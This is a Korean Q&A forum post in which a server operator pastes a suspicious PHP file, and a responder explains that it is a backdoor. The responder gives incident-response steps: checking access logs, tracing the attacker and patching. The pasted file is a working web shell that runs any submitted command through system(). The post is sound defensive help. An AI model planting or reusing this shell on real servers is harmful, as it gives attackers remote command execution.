[질문]

운영하고 있는 서버에

<?
if(count($_GET)) extract($_GET);
if(count($_POST)) extract($_POST);
if(count($_SERVER)) extract($_SERVER);
echo "<form action=$PHP_SELF method=post>command : <input type=text name=cmd>
<input type=submit></form><hr>";
if($cmd) {$cmd = str_replace("\\", "", $cmd);
echo "<pre>";
system($cmd);
echo "</pre>";}
?>

이런 이상한 파일이 생겼습니다.
위의 코드의 분석을 필요로 합니다.
그럼 많은 조언 부탁드립니다.. 감사합니다..

[멍멍님의 답변]

해당 소스 코드는 backdoor의 일종으로서, 공격자가 전달한 문자열을

웹 서버 권한의 쉘 명령으로 실행하는 역할을 합니다.

위 소스 코드 중 핵심만 남기면 <? system($cmd); ?> 가 됩니다.

$cmd 변수로 전달된 문자열을 system 함수로 실행한단 말입니다.

대응 방안으로써..

먼저, 위 소스 코드의 파일명을 웹 서버 로그에서 검색해 보시기 바랍니다.

예로, 아파치라면 grep xxx.php /var/log/httpd/access_log 같은 방법으로

검색하시면 됩니다.

그럼 이 백도어 파일을 요청한 로그가 나올 것입니다. (만약 공격자가 ROOT

권한까지 획득하여 로그를 지워버렸다면 나오지 않을 수도 있습니다.)

로그가 나왔다면 IP와 REFERER 부분을 보고 공격자의 정보를 얻을 수 있으며,

최초 xxx.php가 로그에 남은 시간을 기점으로 주변 로그를 분석해 보시면

공격자가 어떤 방법을 이용해서 서버에 침투했는지 찾을 수 있을 것입니다. (웹해킹으로 침투했다고 가정)

이 정보를 기반으로 취약점 패치와 공격자에 대한 법적 대응을 하시기 바랍니다.